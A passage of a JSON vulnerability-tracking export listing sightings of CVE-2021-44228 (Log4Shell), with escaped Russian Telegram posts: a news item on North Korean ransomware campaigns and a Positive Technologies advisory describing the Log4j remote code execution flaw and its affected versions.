\u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u044b \u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u0439. \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c \u043b\u044e\u0431\u043e\u0439 \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0434\u043e\u043b\u0436\u043d\u0430 \u0441\u0442\u043e\u044f\u0442\u044c \u0432\u043e \u0433\u043b\u0430\u0432\u0435 \u0443\u0433\u043b\u0430.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2023-12-11T16:19:16.000000Z"}, {"uuid": "f74e8548-56b3-431b-b746-7630f4050425", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/itsec_news/2171", "content": "\u200b\u2694\ufe0f \u0421\u0428\u0410 \u0438 \u042e\u0436\u043d\u0430\u044f \u041a\u043e\u0440\u0435\u044f \u043e\u0431\u0432\u0438\u043d\u044f\u044e\u0442 \u0421\u0435\u0432\u0435\u0440\u043d\u0443\u044e \u041a\u043e\u0440\u0435\u044e \u0432 \u043f\u043e\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 \u043a\u0430\u0437\u043d\u044b \u043f\u0443\u0442\u0451\u043c \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a.\n\n\ud83d\udcac \u0421\u0435\u0432\u0435\u0440\u043e\u043a\u043e\u0440\u0435\u0439\u0441\u043a\u0438\u0435 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0437\u0434\u0440\u0430\u0432\u043e\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443 \u0441 \u0446\u0435\u043b\u044c\u044e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0434\u0435\u043d\u0435\u0433 \u0434\u043b\u044f \u0444\u0438\u043d\u0430\u043d\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u0440\u0443\u0433\u0438\u0445 \u0441\u0432\u043e\u0438\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439. \u041e\u0431 \u044d\u0442\u043e\u043c 9 \u0444\u0435\u0432\u0440\u0430\u043b\u044f \u0437\u0430\u044f\u0432\u0438\u043b\u0438 \u0421\u0428\u0410 \u0438 \u042e\u0436\u043d\u0430\u044f \u041a\u043e\u0440\u0435\u044f.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0441\u043e\u044e\u0437\u043d\u0438\u043a\u043e\u0432, \u00ab\u043d\u0435\u0443\u043a\u0430\u0437\u0430\u043d\u043d\u0430\u044f \u0441\u0443\u043c\u043c\u0430 \u0434\u043e\u0445\u043e\u0434\u043e\u0432 \u043e\u0442 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0441 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u043e\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0435\u0439 \u0434\u043b\u044f \u0444\u0438\u043d\u0430\u043d\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0432\u043e\u0438\u0445 \u043d\u0430\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u044b\u0445 \u0446\u0435\u043b\u0435\u0439, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043a\u0438\u0431\u0435\u0440\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0442\u0438\u0432 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432 \u0421\u0428\u0410 \u0438 \u042e\u0436\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0438\u00bb.\n\n\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e\u043c\u0443 \u043e\u0442\u0447\u0451\u0442\u0443 CISA, \u0424\u0411\u0420, \u0410\u041d\u0411 \u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u043e\u0431\u043e\u0440\u043e\u043d\u043d\u044b\u0445 \u0438 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432 \u042e\u0436\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0438, \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u043d\u0430 IT-\u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043e\u0431\u043e\u0440\u043e\u043d\u043d\u043e\u0439 \u0441\u0444\u0435\u0440\u044b \u0421\u0428\u0410 \u0438 \u0432\u043e\u0435\u043d\u043d\u044b\u0445 \u043f\u043e\u0434\u0440\u044f\u0434\u0447\u0438\u043a\u043e\u0432.\n\n\u0421\u0435\u0432\u0435\u0440\u043e\u043a\u043e\u0440\u0435\u0439\u0441\u043a\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u043a\u0430\u043a \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u043a\u0438, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a Maui \u0438 H0lyGh0st , \u0442\u0430\u043a \u0438 \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit, My Little Ransomware, NxRansomware, Ryuk, YourRansom.\n\n\u042d\u0442\u043e \u043f\u0435\u0440\u0432\u044b\u0439 \u0441\u043b\u0443\u0447\u0430\u0439, \u043a\u043e\u0433\u0434\u0430 \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430 \u0441\u0432\u044f\u0437\u0430\u043b\u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0433\u043e \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Deadbolt \u0438 ech0raix \u2013 \u044d\u0442\u0438 \u0448\u0442\u0430\u043c\u043c\u044b \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a\u0430 \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u044f QNAP .\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u0432\u0433\u0435\u043d\u0442\u0441\u0442\u0432, \u0441\u0435\u0432\u0435\u0440\u043e\u043a\u043e\u0440\u0435\u0439\u0441\u043a\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u043f\u044b\u0442\u0430\u043b\u0438\u0441\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0441\u0435\u0431\u044f \u0447\u043b\u0435\u043d\u0430\u043c\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0433\u0440\u0443\u043f\u043f \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a REvil . \u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0441\u043e\u0437\u0434\u0430\u044e\u0442 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u043e\u043c\u0435\u043d\u043e\u0432 \u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439, \u0447\u0442\u043e\u0431\u044b \u0441\u043a\u0440\u044b\u0442\u044c \u0441\u0432\u043e\u0438 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f. \u041e\u043d\u0438 \u0442\u0430\u043a\u0436\u0435 \u00ab\u043f\u043e\u043a\u0443\u043f\u0430\u044e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, IP-\u0430\u0434\u0440\u0435\u0441\u0430 \u0438 \u0434\u043e\u043c\u0435\u043d\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b, \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u043e\u0439 \u0432 \u0445\u043e\u0434\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439\u00bb. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 VPN, \u0447\u0442\u043e\u0431\u044b \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0432\u043f\u0435\u0447\u0430\u0442\u043b\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u0430\u0442\u0430\u043a\u0438 \u0438\u0441\u0445\u043e\u0434\u044f\u0442 \u0438\u0437 \u0434\u0440\u0443\u0433\u0438\u0445 \u043c\u0435\u0441\u0442 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u043c\u0438 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u041a\u043e\u0440\u0435\u0438.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u043e\u0431\u044b\u0447\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 - Log4Shell (CVE-2021-44228), CVE-2021-20038 \u0438 CVE-2022-24990 . \u041f\u043e\u043c\u0438\u043c\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439, \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0434\u0440\u0443\u0433\u0438\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445, \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u0438 \u043a\u0440\u0430\u0436\u0438 \u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u0425\u0430\u043a\u0435\u0440\u044b \u041a\u041d\u0414\u0420 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u044e\u0442 \u0432\u044b\u043a\u0443\u043f \u0432 \u0431\u0438\u0442\u043a\u043e\u0439\u043d\u0430\u0445 \u0438 \u043e\u0431\u0449\u0430\u044e\u0442\u0441\u044f \u0441 \u0436\u0435\u0440\u0442\u0432\u0430\u043c\u0438 \u0447\u0435\u0440\u0435\u0437 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u0443\u044e \u043f\u043e\u0447\u0442\u0443 Proton Mail. \u0414\u043b\u044f \u0447\u0430\u0441\u0442\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0432 \u0441\u0435\u043a\u0442\u043e\u0440\u0435 \u0437\u0434\u0440\u0430\u0432\u043e\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438 \u043c\u043e\u0433\u0443\u0442 \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0442 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u0435\u043c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043a\u043e\u043d\u043a\u0443\u0440\u0435\u043d\u0442\u0430\u043c, \u0435\u0441\u043b\u0438 \u0432\u044b\u043a\u0443\u043f \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0443\u043f\u043b\u0430\u0447\u0435\u043d.\n\n\u0410\u043b\u043b\u0430\u043d \u041b\u0438\u0441\u043a\u0430, \u044d\u043a\u0441\u043f\u0435\u0440\u0442 \u043f\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f\u043c \u0438\u0437 \u0418\u0411-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Recorded Future \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u043b, \u0447\u0442\u043e \u0421\u0435\u0432\u0435\u0440\u043d\u0430\u044f \u041a\u043e\u0440\u0435\u044f \u0432\u0441\u0435\u0433\u0434\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 2017 \u0433\u043e\u0434\u0430, \u043d\u043e \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443 \u043e\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u043e\u0438 \u0430\u0442\u0430\u043a\u0438, \u0447\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b\u043e \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0435\u0449\u0435 \u0431\u043e\u043b\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u043c \u043f\u0440\u043e\u0442\u0438\u0432\u043d\u0438\u043a\u043e\u043c.\n\n#\u0421\u0428\u0410 #\u041a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2023-02-14T09:51:56.000000Z"}, {"uuid": "5714bd3a-2624-4197-a3ce-8edbab0144f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/codeby_sec/5349", "content": "\u0423\u0412\u0415\u0414\u041e\u041c\u041b\u0415\u041d\u0418\u0415 \u041e \u041a\u0420\u0418\u0422\u0418\u0427\u0415\u0421\u041a\u041e\u0419 \u0423\u042f\u0417\u0412\u0418\u041c\u041e\u0421\u0422\u0418 CVE-2021-44228\n\n\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Positive Technologies \u0443\u0432\u0435\u0434\u043e\u043c\u043b\u044f\u0435\u0442 \u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u00ab\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430\u00bb (CVE-2021-44228), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u0430 \u043d\u0430 \u043f\u043e\u0440\u0442\u0430\u043b\u0435 GitHub 9 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2021 \u0433\u043e\u0434\u0430. \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u041f\u041e Apache Log4j \u0432\u0435\u0440\u0441\u0438\u0439 \u0441 2.0 \u043f\u043e 2.14.1.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 \u0431\u0435\u0437 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438. Log4j \u2013 \u044d\u0442\u043e \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 \u044f\u0437\u044b\u043a\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Java \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c\n\u043a\u043e\u0434\u043e\u043c, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u0430\u044f Apache Foundation. \u041e\u043d\u0430 \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u043e \u043c\u043d\u043e\u0433\u0438\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445). \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043b\u044e\u0431\u043e\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u044b\u0435 \u0432 \u0444\u0430\u0439\u043b\u044b \u0436\u0443\u0440\u043d\u0430\u043b\u0430 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438\n\u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Log4j. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043c\u043d\u043e\u0436\u0435\u0441\u0442\u0432\u043e\u043c \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0432 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e\u0433\u043e\n\u0441\u0435\u0440\u0432\u0438\u0441\u0430. \u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Positive Technologies \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u0443\u0434\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u043d\u0435\u0442 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u043c\u0443 \u0440\u0438\u0441\u043a\u0443 \u0442\u044b\u0441\u044f\u0447\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439.\n\n\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u00ab\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430\u00bb (CVE-2021-44228) \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Positive Technologies \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c\n\u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:\n\u25cf \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0435 \u041f\u041e, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0435 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u00ab\u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e\u00bb, \u0443\u044f\u0437\u0432\u0438\u043c\u043e \u0432 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0441\u043b\u0443\u0447\u0430\u0435\u0432;\n\u25cf \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438;\n\u25cf \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 Log4j \u0441 2.0 \u043f\u043e 2.14.1;\n\u25cf \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 Log4j.\n\n\u0412\u043b\u0438\u044f\u043d\u0438\u0435 